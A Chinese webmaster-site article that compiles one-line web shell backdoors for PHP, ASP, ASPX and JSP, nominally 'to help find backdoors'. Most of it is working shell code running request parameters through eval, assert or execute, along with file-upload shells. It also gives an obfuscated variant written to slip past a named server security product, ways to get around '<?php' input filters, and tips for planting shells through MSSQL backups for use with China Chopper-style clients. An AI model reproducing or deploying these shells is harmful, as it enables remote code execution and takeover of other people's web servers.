整理的比较全的一句话后门代码(方面大家查找后门)
发布时间:2016-11-30 10:27:47 所属栏目:MySql教程 来源:站长网
导读:最近一句话后门不断升级大家注意防范,基本上多事字符替换 过护卫神PHP一句话作者:小东 复制代码 代码如下: lt;?php $a = str_replace(x,”",”axsxxsxexrxxt”); $a($_POST["c"]); ?gt; 测试成功,主要对付护卫神,其他的也可以试试 dedecms5.7一句话后门
|
最近一句话后门不断升级大家注意防范,基本上多事字符替换 过护卫神PHP一句话作者:小东 复制代码 代码如下: lt;?php $a = str_replace(x,”",”axsxxsxexrxxt”); $a($_POST["c"]); ?gt; 测试成功,主要对付护卫神,其他的也可以试试 dedecms5.7一句话后门 @eval(file_get_contents('php://input')); asp一句话木马 程序代码 lt;%eval request("sb")%gt; 程序代码 lt;%execute request("sb")%gt; 程序代码 lt;%execute(request("sb"))%gt; 程序代码 lt;%execute request("sb")%gt;lt;%'lt;% loop lt;%:%gt; 程序代码 lt;%'lt;% loop lt;%:%gt;lt;%execute request("sb")%gt; 程序代码 lt;%execute request("sb")'lt;% loop lt;%:%gt;[code] [code]lt;script language=vbs runat=servergt;eval(request("sb"))lt;/scriptgt; 程序代码 %gt;lt;%Eval(Request(chr(35)))%gt;lt;% 程序代码 lt;%eval request("sb")%gt; 程序代码 lt;%ExecuteGlobal request("sb")%gt; 程序代码 if Request("sb")lt;gt;"" then ExecuteGlobal request("sb") end if //容错代码 程序代码 lt;%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%gt; lt;% var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'}; lcx.性别((lcx.名字)+''); %gt; //使用冰狐一句话客户端链接 程序代码 lt;% Set o = Server.CreateObject("ScriptControl") o.language = "vbscript" o.addcode(Request("SubCode")) '参数SubCode作为过程代码 o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数 %gt; 调用示例: 程序代码 http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20subv=response.write%28server.mappath%28%22tmp.asp%22%29%29 php一句话 程序代码 lt;?php eval($_POST[sb])?gt; 程序代码 lt;?php @eval($_POST[sb])?gt; //容错代码 程序代码 lt;?php assert($_POST[sb]);?gt; //使用lanker一句话客户端的专家模式执行相关的php语句 程序代码 lt;?$_POST['sa']($_POST['sb']);?gt; 程序代码 lt;?$_POST['sa']($_POST['sb'],$_POST['sc'])?gt; 程序代码 lt;?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?gt; //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 程序代码 lt;Ogt;h=@eval($_POST[c]);lt;/Ogt; 程序代码 lt;script language="php"gt;@eval($_POST[sb])lt;/scriptgt; //绕过lt;?限制的一句话 JSP一句话 程序代码 lt;% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %gt; 提交客户端 程序代码 lt;form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post"gt; lt;textarea name=t cols=120 rows=10 width=45gt;your codelt;/textareagt;lt;BRgt;lt;centergt;lt;brgt; lt;input type=submit value="提交"gt; lt;/formgt; ASPX一句话 程序代码 lt;%@ Page Language="Jscript"%gt;lt;%eval(Request.Item["pass"],"unsafe");%gt; 程序代码 lt;%@ Page Language="Jscript" validateRequest="false" %gt;lt;%Response.Write(eval(Request.Item["w"],"unsafe"));%gt; //Jscript的asp.net一句话 程序代码 lt;%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%gt; //C#的asp.net一句话 程序代码 lt;% If Request.Files.Count lt;gt; 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %gt; VB的asp.net一句话 第一:114la网址导航系统后台getwebshell,最新版本,已经禁止了直接输入lt;?php这样的代码 所以可以试用lt;script language="php"gt;...lt;scriptgt;来绕过 第二,使用菜刀的附加数据功能可以出现很多转换.所以还是仔细阅读下菜刀的readme.txt,上面的代码来自LCX的博客 第三,使用mssql备份一句话的时候,特别是asp.net和jsp,因为代码过长,所以,需要再代码前面和后面多加空格等垃圾字符保证代码完整性,这个跟备份bat到启动项一个原理. (编辑:源码网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
